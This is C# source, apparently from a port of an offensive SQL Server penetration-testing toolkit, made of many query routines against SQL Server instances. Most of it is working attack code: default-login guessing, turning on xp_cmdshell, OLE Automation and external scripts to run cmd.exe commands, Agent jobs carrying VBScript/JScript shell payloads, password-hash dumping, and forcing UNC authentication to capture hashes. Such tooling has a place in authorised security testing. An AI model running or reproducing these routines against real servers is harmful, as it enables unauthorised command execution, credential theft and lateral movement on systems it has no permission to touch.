internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
string dbInstance = instance.Split(new string[] { @"\", @"," }, StringSplitOptions.RemoveEmptyEntries).LastOrDefault();
string[] defaults = logins.GetValues(dbInstance);
if (0 == defaults.Length)
{
return(false);
}
foreach (var d in defaults)
{
Console.WriteLine(d);
string[] userpass = d.Split('\0');
Credentials creds = new Credentials(userpass[0], userpass[1]);
sql.BuildConnectionString(creds);
if (sql.Connect())
{
Console.WriteLine("[+] {0} : {1}:{2}", instance, creds.GetUsername(), creds.GetPassword());
}
}
}
return(true);
}
internal void Query(string query)
{
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not SysAdmin");
return;
}
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return;
}
int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
if (0 == sao_value)
{
Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
}
int xcs_value = (int)_Query(sql, @"sp_configure 'Ole Automation Procedures'", "config_value");
if (0 == xcs_value)
{
Console.WriteLine("{0} : Ole Automation Procedures is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'Ole Automation Procedures',1;RECONFIGURE", string.Empty);
}
StringBuilder sb = new StringBuilder();
sb.Append(QUERY1_1);
sb.Append(string.Format("EXEC Sp_oamethod @shell, \'run\' , null, \'cmd.exe /c \"{0} > {1}\"\'", query, fileName));
Console.WriteLine(App.DELIMITER);
Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
Console.WriteLine(App.DELIMITER);
System.Threading.Thread.Sleep(1000);
sb.Clear();
sb.Append(QUERY2_1);
sb.Append(string.Format("EXEC Sp_oamethod @fso, \'opentextfile\' , @file Out, \'{0}\', 1", fileName));
sb.Append(QUERY2_3);
sb.Append(string.Format("EXEC sp_oamethod @o, \'opentextfile\', @f out, \'{0}\', 1", fileName));
sb.Append(QUERY2_5);
Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
sb.Clear();
sb.Append(QUERY3_1);
sb.Append(string.Format("EXEC Sp_oamethod @Shell, \'run\' , null, \'cmd.exe /c \"del {0}\"\' , \'0\' , \'true\'", fileName));
Console.WriteLine((string)_Query(sql, sb.ToString(), string.Empty));
if (0 == xcs_value && restoreState)
{
_Query(sql, @"sp_configure 'Ole Automation Procedures',0;RECONFIGURE", string.Empty);
}
if (0 == sao_value && restoreState)
{
_Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
}
}
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
for (int i = start; i <= end; i++)
{
string query1_1 = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],\n" +
"\'{2}\' as [DatabaseId],\n" +
"DB_NAME({2}) as [DatabaseName]",
computerName, instance, i
);
#if DEBUG
Console.WriteLine(query1_1);
#endif
table = sql.Query(query1_1);
foreach (DataRow row in table.AsEnumerable())
{
try
{
Fuzz f = new Fuzz
{
ComputerName = computerName,
Instance = instance,
DatabaseId = (string)row["DatabaseId"],
};
if (!(row["DatabaseName"] is DBNull))
{
f.DatabaseName = (string)row["DatabaseName"];
}
#if DEBUG
Misc.PrintStruct <Fuzz>(f);
#endif
fuzzed.Add(f);
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
continue;
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
}
}
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
#if DEBUG
Console.WriteLine(QUERY1_1);
#endif
foreach (DataRow r in sql.Query(QUERY1_1).AsEnumerable())
{
_AddLink(r);
}
#if DEBUG
Console.WriteLine(QUERY2_1);
#endif
sourceInstance = instance;
foreach (DataRow r in sql.Query(QUERY2_1).AsEnumerable())
{
#if DEBUG
Console.WriteLine((string)r["srvname"]);
#endif
_Query(sql, string.Empty, (string)r["srvname"], 0);
}
}
return(true);
}
internal override bool Query()
{
string query1_1 = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],",
computerName, instance
);
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
if (!string.IsNullOrEmpty(linkNameFilter))
{
sb.Append(linkNameFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
serverLinks = sql.Query <ServerLink>(sb.ToString(), new ServerLink());
Console.WriteLine("Test");
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
string query1_1 = string.Format("use [{0}];\n" +
"SELECT \'{1}\' as [ComputerName],\n" +
"\'{2}\' as [Instance],\n" +
"\'{3}\' as [DatabaseName],\n",
database, computerName, instance, database);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
if (!string.IsNullOrEmpty(procedureNameFilter))
{
sb.Append(procedureNameFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
procedures = sql.Query <Procedure>(sb.ToString(), new Procedure());
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
string query1_1 = string.Format(
"USE [{0}];" +
"SELECT \'{0}\' as [ComputerName]," +
"\'{1}\' as [Instance],",
database, computerName, instance);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
sb.Append(autoExecFilter);
sb.Append(procedureNameFilter);
sb.Append(keywordFilter);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
files = sql.Query <AssemblyFiles>(sb.ToString(), new AssemblyFiles());
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
StringBuilder sb = new StringBuilder();
sb.Append(string.Format("USE {0};\n", database));
sb.Append(string.Format("SELECT \'{0}\' as [ComputerName],\n", computerName));
sb.Append(string.Format("\'{0}\' as [Instance],", instance));
sb.Append(QUERY1_3);
sb.Append(string.Format("FROM[{0}].[INFORMATION_SCHEMA].[TABLES]", database));
if (!string.IsNullOrEmpty(tableFilter))
{
sb.Append(tableFilter);
}
sb.Append(QUERY1_5);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
tables = sql.Query <Table>(sb.ToString(), new Table());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* Table t = new Table
* {
* ComputerName = (string)row["ComputerName"],
* Instance = (string)row["Instance"],
* DatabaseName = (string)row["DatabaseName"],
* SchemaName = (string)row["SchemaName"],
* TableName = (string)row["TableName"],
* TableType = (string)row["TableType"]
* };
#if DEBUG
* Misc.PrintStruct<Table>(t);
#endif
* tables.Add(t);
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex);
* return false;
* }
* }
*/
return(true);
}
internal override bool Query()
{
string query1_1 = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],",
computerName, instance);
int versionShort = 0;
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
SQLServerInfo serverInfo = new SQLServerInfo(credentials);
serverInfo.SetInstance(instance);
if (!serverInfo.Query())
{
return(false);
}
SQLServerInfo.Details details = serverInfo.GetResults();
int.TryParse(details.SQLServerMajorVersion.Split('.').First(), out versionShort);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(query1_2);
if (versionShort > 10)
{
sb.Append(query1_3);
}
sb.Append(query1_4);
if (!string.IsNullOrEmpty(databaseFilter))
{
sb.Append(databaseFilter);
}
if (!string.IsNullOrEmpty(noDefaultsFilter))
{
sb.Append(noDefaultsFilter);
}
if (!string.IsNullOrEmpty(hasAccessFilter))
{
sb.Append(hasAccessFilter);
}
if (!string.IsNullOrEmpty(sysAdminFilter))
{
sb.Append(sysAdminFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
databases = sql.Query <Database>(sb.ToString(), new Database());
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
if (0 == sao_value)
{
_Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
}
//table = sql.Query("sp_configure");
configs = sql.Query <Config>("sp_configure", new Config());
if (0 == sao_value && restoreState)
{
_Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
}
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* Config c = new Config
* {
* ComputerName = computerName,
* Instance = instance,
* Name = (string)row["Name"],
* Minimum = (int)row["Minimum"],
* Maximum = (int)row["Maximum"],
* config_value = (int)row["config_value"],
* run_value = (int)row["run_value"]
* };
#if DEBUG
* Misc.PrintStruct<Config>(c);
#endif
* configs.Add(c);
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex);
* return false;
* }
* }
*/
return(true);
}
internal void Query(string query)
{
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not SysAdmin");
return;
}
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return;
}
int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
if (0 == sao_value)
{
Console.WriteLine("{0} : Show Advanced Options is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
}
else
{
Console.WriteLine("{0} : Show Advanced Options is enabled.", instance);
}
int xcs_value = (int)_Query(sql, @"sp_configure 'xp_cmdshell'", "config_value");
if (0 == xcs_value)
{
Console.WriteLine("{0} : xp_cmdshell is disabled, enabling.", instance);
_Query(sql, @"sp_configure 'xp_cmdshell',1;RECONFIGURE", string.Empty);
}
else
{
Console.WriteLine("{0} : xp_cmdshell is enabled.", instance);
}
Console.WriteLine(App.DELIMITER);
Console.WriteLine((string)_Query(sql, string.Format("EXEC master..xp_cmdshell \'{0}\'", query), "output"));
Console.WriteLine(App.DELIMITER);
if (0 == xcs_value && restoreState)
{
Console.WriteLine("{0} : Disabling xp_cmdshell.", instance);
_Query(sql, @"sp_configure 'xp_cmdshell',0;RECONFIGURE", string.Empty);
}
if (0 == sao_value && restoreState)
{
Console.WriteLine("{0} : Disabling Show Advanced Options.", instance);
_Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
}
}
}
internal bool Query(string query)
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (sql.Connect())
{
DataTable table = sql.Query(query);
StringBuilder output = new StringBuilder();
try
{
foreach (DataRow row in table.AsEnumerable())
{
foreach (var col in row.ItemArray)
{
try
{
if (col is byte[])
{
output.AppendFormat("{0}\n", BitConverter.ToString((byte[])col));
}
else
{
output.AppendFormat("{0}\n", col);
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
continue;
}
}
}
Console.WriteLine(output.ToString());
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
Console.WriteLine("Empty Response");
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
}
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
oleProviders = sql.Query <OleProvider>(QUERY1_1, new OleProvider());
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
string query1_1 = string.Format(
"USE {0};\n" +
"SELECT \'{1}\' as [ComputerName],\n" +
"\'{2}\' as [Instance],\n" +
"\'{0}\' as [DatabaseName],",
database, computerName, instance);
string query1_3 = string.Format(
"FROM {0}.sys.database_principals rp \n" +
"INNER JOIN {0}.sys.database_permissions pm \n" +
"ON pm.grantee_principal_id = rp.principal_id \n" +
"LEFT JOIN {0}.sys.schemas ss \n" +
"ON pm.major_id = ss.schema_id \n" +
"LEFT JOIN {0}.sys.objects obj \n" +
"ON pm.[major_id] = obj.[object_id] WHERE 1 = 1",
database);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
sb.Append(query1_3);
if (!string.IsNullOrEmpty(permissionNameFilter))
{
sb.Append(permissionNameFilter);
}
if (!string.IsNullOrEmpty(principalNameFilter))
{
sb.Append(principalNameFilter);
}
if (!string.IsNullOrEmpty(permissionTypeFilter))
{
sb.Append(permissionTypeFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
databasePrivileges = sql.Query <DatabasePrivilege>(sb.ToString(), new DatabasePrivilege());
}
return(true);
}
internal void Query(string query)
{
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not SysAdmin");
return;
}
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return;
}
int sao_value = (int)_Query(sql, @"sp_configure 'Show Advanced Options'", "config_value");
if (0 == sao_value)
{
_Query(sql, @"sp_configure 'Show Advanced Options',1;RECONFIGURE", string.Empty);
}
int xcs_value = (int)_Query(sql, @"sp_configure 'external scripts enabled'", "config_value");
if (0 == xcs_value)
{
_Query(sql, @"sp_configure 'external scripts enabled',1;RECONFIGURE", string.Empty);
}
StringBuilder sb = new StringBuilder();
sb.Append(QUERY1_1);
sb.Append(string.Format("p = subprocess.Popen(\"cmd.exe /c {0}\", stdout=subprocess.PIPE)\n", query));
sb.Append(QUERY1_3);
sb.Append(QUERY1_4);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
Console.WriteLine(App.DELIMITER);
Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
Console.WriteLine(App.DELIMITER);
if (0 == xcs_value && restoreState)
{
_Query(sql, @"sp_configure 'external scripts enabled',0;RECONFIGURE", string.Empty);
}
if (0 == sao_value && restoreState)
{
_Query(sql, @"sp_configure 'Show Advanced Options',0;RECONFIGURE", string.Empty);
}
}
}
internal static bool Query(string instance, string computerName, Credentials credentials)
{
string query = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],\n" +
"CASE\n" +
"WHEN IS_SRVROLEMEMBER(\'sysadmin\') = 0 THEN \'No\'\n" +
"ELSE \'Yes\'\n" +
"END as IsSysadmin"
, computerName, instance
);
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
DataTable table = sql.Query(query);
try
{
foreach (DataRow row in table.AsEnumerable())
{
#if DEBUG
Console.WriteLine("{0}\t{1}\t{2}", row["Instance"].ToString(), row["Instance"].ToString(), row["IsSysadmin"].ToString());
#endif
return("Yes" == row["IsSysadmin"].ToString() ? true : false);
}
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
Console.WriteLine("Empty Response");
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
return(false);
}
}
internal override bool Query()
{
SQLServerInfo i = new SQLServerInfo(credentials);
i.SetInstance(instance);
i.Query();
var info = i.GetResults();
SetPermissionNameFilter("IMPERSONATE");
base.Query();
using (SQLConnection sql = new SQLConnection())
{
sql.BuildConnectionString(credentials);
sql.Connect();
foreach (var j in serverPrivileges)
{
string query = string.Format("SELECT IS_SRVROLEMEMBER(\'sysadmin\', \'{0}\') as Status", j.ObjectName);
foreach (var r in sql.Query(query).AsEnumerable())
{
if (!(r["Status"] is DBNull) && 1 == (int)r["Status"])
{
var s = new Impersonate
{
ComputerName = computerName,
Instance = instance,
Vulnerability = "Excessive Privilege - Impersonate Login",
Description = "The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges.",
Remediation = "Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user]",
Severity = "High",
IsVulnerable = "Yes",
IsExploitable = "Unknown",
Exploited = "No",
ExploitCmd = "",
Reference = @"https://msdn.microsoft.com/en-us/library/ms181362.aspx",
Details = string.Format("{0} can impersonate the {1} SYSADMIN login. This test was ran with the {2} login.", j.GranteeName, j.ObjectName, info.Currentlogin)
};
impersonates.Add(s);
}
}
}
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not Sysadmin");
return(false);
}
SQLServerInfo i = new SQLServerInfo(credentials);
i.SetInstance(instance);
i.Query();
SQLServerInfo.Details d = i.GetResults();
int versionShort;
if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
{
Console.WriteLine("[-] Unable to ascertain SQL Version");
Console.WriteLine("[*] It is possible to override this with the --version flag");
return(false);
}
string query = string.Empty;
if (8 < versionShort)
{
query = QUERY1_1;
}
else
{
query = QUERY2_1;
}
//table = sql.Query(query);
hashes = sql.Query <Hash>(query, new Hash());
}
return(false);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (sql.Connect())
{
SQLServerInfo i = new SQLServerInfo(credentials);
i.SetInstance(instance);
i.Query();
SQLServerInfo.Details d = i.GetResults();
int versionShort;
if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
{
Console.WriteLine("[-] Unable to ascertain SQL Version");
Console.WriteLine("[*] It is possible to override this with the --version flag");
return(false);
}
string query1 = string.Empty;
string query2 = string.Empty;
if (11 > versionShort)
{
query1 = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
query2 = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
}
else
{
query1 = string.Format("xp_dirtree \'{0}\'", uncpath);
query2 = string.Format("xp_fileexist \'{0}\'", uncpath);
}
_Query(sql, query1);
_Query(sql, query2);
}
}
return(true);
}
internal override bool Query()
{
string query1_1 = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],",
computerName, instance
);
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
if (!string.IsNullOrEmpty(auditNameFilter))
{
sb.Append(auditNameFilter);
}
if (!string.IsNullOrEmpty(auditSpecificationFilter))
{
sb.Append(auditSpecificationFilter);
}
if (!string.IsNullOrEmpty(auditActionNameFilter))
{
sb.Append(auditActionNameFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
databaseSpecifications = sql.Query <DatabaseSpecification>(sb.ToString(), new DatabaseSpecification());
}
return(true);
}
internal void Query(string query)
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return;
}
if (!_Check(sql))
{
return;
}
string command = string.Empty;
string dbSubSystem = string.Empty;
query = query.Replace("\'", "\'\'");
string command_j = string.Format(
"function RunCmd()\n" +
"{\n" +
"var WshShell = new ActiveXObject(\"WScript.Shell\");\n" +
"var oExec = WshShell.Exec(\"{0}\");\n" +
"oExec = null;\n" +
"WshShell = null;\n" +
"}\n" +
"RunCmd();",
query
);
string command_a = string.Format(
"Function Main()\n" +
"dim shell\n" +
"set shell = CreateObject(\"WScript.Shell\")\n" +
"shell.run(\"{0}\")\n" +
"set shell = nothing\n" +
"END Function",
query
);
if (subsystem.ToLower() == "vbscript")
{
command = command_a;
dbSubSystem = "N\'VBScript\',";
}
else if (subsystem.ToLower() == "jscript")
{
command = command_j;
dbSubSystem = "N\'JavaScript\',";
}
else
{
return;
}
string query1_1 = string.Format(
"USE msdb;\n" +
"EXECUTE dbo.sp_add_job\n" +
"@job_name = N\'powerupsql_job\'\n" +
"EXECUTE sp_add_jobstep\n" +
"@job_name = N\'powerupsql_job\',\n" +
"@step_name = N\'powerupsql_job_step\',\n" +
"@subsystem = N'ActiveScripting',\n" +
"@command = N\'{1}\',\n",
subsystem, command
);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(dbSubSystem);
sb.Append(QUERY1_2);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
sb.Clear();
sb.Append(QUERY2_1);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
Console.WriteLine(App.DELIMITER);
Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
Console.WriteLine(App.DELIMITER);
sb.Clear();
sb.Append(QUERY3_1);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
}
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
if (!_Check(sql))
{
return(false);
}
StringBuilder sb = new StringBuilder();
sb.Append(QUERY2_1);
if (!string.IsNullOrEmpty(keywordFilter))
{
sb.Append(keywordFilter);
}
if (!string.IsNullOrEmpty(subsystemFilter))
{
sb.Append(subsystemFilter);
}
if (!string.IsNullOrEmpty(proxyCredFilter))
{
sb.Append(proxyCredFilter);
}
if (!string.IsNullOrEmpty(usingProxyCredFilter))
{
sb.Append(usingProxyCredFilter);
}
table = sql.Query(sb.ToString());
}
foreach (DataRow row in table.AsEnumerable())
{
try
{
ServerJob sj = new ServerJob
{
ComputerName = computerName,
Instance = instance,
DatabaseName = database,
Job_Id = (int)row["Job_Id"],
Job_Name = (string)row["Job_Name"],
Job_Description = (string)row["Job_Description"],
Job_Owner = (string)row["Job_Owner"],
Proxy_Id = (int)row["Proxy_Id"],
Proxy_Credential = (string)row["Proxy_Credential"],
Date_Created = (string)row["Date_Created"],
Last_Run_Date = (DateTime)row["Last_Run_Date"],
Enabled = (bool)row["Enabled"],
Server = (string)row["Server"],
Step_Name = (string)row["Step_Name"],
SubSystem = (string)row["SubSystem"],
Command = (string)row["Command"]
};
#if DEBUG
Misc.PrintStruct <ServerJob>(sj);
#endif
serverJobs.Add(sj);
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
Console.WriteLine("Empty Response");
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
}
return(true);
}
internal override bool Query()
{
bool isSysAdmin = false;
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);
StringBuilder sb = new StringBuilder();
sb.Append(string.Format("USE master;\nSELECT \'{0}\' as [ComputerName],\n\'{1}\' as [Instance],", computerName, instance));
sb.Append(QUERY1_2);
if (!string.IsNullOrEmpty(credentialFilter))
{
sb.Append(credentialFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
serverCredentials = sql.Query <ServerCredential>(sb.ToString(), new ServerCredential());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* ServerCredential sc = new ServerCredential
* {
* ComputerName = (string)row["ComputerName"],
* Instance = (string)row["Instance"],
* credential_id = (int)row["credential_id"],
* CredentialName = (string)row["CredentialName"],
* credential_identity = (string)row["credential_identity"],
* create_date = (DateTime)row["create_date"],
* modify_date = (DateTime)row["modify_date"],
* target_type = (string)row["target_type"],
* target_id = (int)row["target_id"]
* };
#if DEBUG
* Misc.PrintStruct<ServerCredential>(sc);
#endif
* serverCredentials.Add(sc);
* return true;
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex.Message);
* return false;
* }
* }
*/
return(false);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
string query1_1 = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],\n" +
"n as [PrincipalId],\n" +
"SUSER_NAME(n) as [PrincipleName]\n" +
"FROM(\n" +
"SELECT top {2} row_number() over(order by t1.number) as N\n" +
"FROM master..spt_values t1\n" +
" cross join master..spt_values t2\n" +
") a\n" +
"WHERE SUSER_NAME(n) is not null",
computerName, instance, end
);
#if DEBUG
Console.WriteLine(query1_1);
#endif
foreach (var row in sql.Query(query1_1).AsEnumerable())
{
try
{
Fuzz f = new Fuzz
{
ComputerName = computerName,
Instance = instance,
PrincipalId = (long)row["PrincipalId"],
};
if (!(row["PrincipleName"] is DBNull))
{
f.PrincipleName = (string)row["PrincipleName"];
f.PrincipalType = string.Empty;
fuzzed.Add(f);
}
else
{
continue;
}
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
continue;
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
}
Fuzz[] arrFuzz = fuzzed.ToArray();
for (int i = 0; i < fuzzed.Count; i++)
{
string query2_1 = string.Format("EXEC master..sp_defaultdb \'{0}\', \'NOTAREALDATABASE1234ABCD\'", arrFuzz[i].PrincipleName);
try
{
using (SqlDataReader reader = new SqlCommand(query2_1, sql.GetSQL()).ExecuteReader()){ }
}
catch (Exception ex)
{
if (ex is SqlException)
{
if (ex.Message.Contains("NOTAREALDATABASE") || ex.Message.Contains("alter the login"))
{
if (arrFuzz[i].PrincipleName.Contains(@"\"))
{
arrFuzz[i].PrincipalType = "Windows Account";
}
else
{
arrFuzz[i].PrincipalType = "SQL Login";
}
}
else
{
arrFuzz[i].PrincipalType = "SQL Server Role";
}
}
else
{
Console.WriteLine(ex);
}
}
}
fuzzed = arrFuzz.ToList();
}
return(true);
}
internal override bool Query()
{
string query1_1 = string.Format(
"USE {0};\n" +
"SELECT \'{1}\' as [ComputerName],\n" +
"\'{2}\' as [Instance],",
database, computerName, instance
);
string query1_3 = string.Format(
"FROM [{0}].[INFORMATION_SCHEMA].[SCHEMATA]",
database
);
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
sb.Append(query1_3);
if (!string.IsNullOrEmpty(schemaFilter))
{
sb.Append(schemaFilter);
}
sb.Append(QUERY1_4);
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
schemas = sql.Query <Schema>(sb.ToString(), new Schema());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* Schema s = new Schema
* {
* ComputerName = (string)row["ComputerName"],
* Instance = (string)row["Instance"],
* DatabaseName = (string)row["DatabaseName"],
* SchemaName = (string)row["SchemaName"],
* SchemaOwner = (string)row["SchemaOwner"],
* };
#if DEBUG
* Misc.PrintStruct<Schema>(s);
#endif
* schemas.Add(s);
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex);
* return false;
* }
* }
*/
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
string query1_1 = string.Format(
"USE {0};\n" +
"SELECT \'{1}\' as [ComputerName],\n" +
"\'{2}\' as [Instance],\n" +
"\'{0}\' as [DatabaseName],",
database, computerName, instance);
string query1_3 = string.Format(
"FROM [{0}].[sys].[database_principals]\n" +
"WHERE type like \'R\'",
database);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
sb.Append(query1_3);
if (!string.IsNullOrEmpty(rolePrincipalNameFilter))
{
sb.Append(rolePrincipalNameFilter);
}
if (!string.IsNullOrEmpty(roleOwnerFilter))
{
sb.Append(roleOwnerFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
databaseRoles = sql.Query <DatabaseRole>(sb.ToString(), new DatabaseRole());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* DatabaseRole dr = new DatabaseRole
* {
* ComputerName = computerName,
* Instance = instance,
* DatabaseName = database,
* RolePrincipalId = (int)row["RolePrincipalId"],
* RolePrincipalSid = (byte[])row["RolePrincipalSid"],
* RolePrincipalName = (string)row["RolePrincipalName"],
* RolePrincipalType = (string)row["RolePrincipalType"],
* OwnerPrincipalId = (int)row["OwnerPrincipalId"],
* OwnerPrincipalName = (string)row["OwnerPrincipalName"],
* is_fixed_role = (bool)row["is_fixed_role"],
* create_date = (DateTime)row["create_date"],
* modify_Date = (DateTime)row["modify_Date"],
* default_schema_name = (object)row["default_schema_name"]
* };
#if DEBUG
* Misc.PrintStruct<DatabaseRole>(dr);
#endif
* databaseRoles.Add(dr);
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex.Message);
* return false;
* }
* }
*/
return(true);
}
internal override bool Query()
{
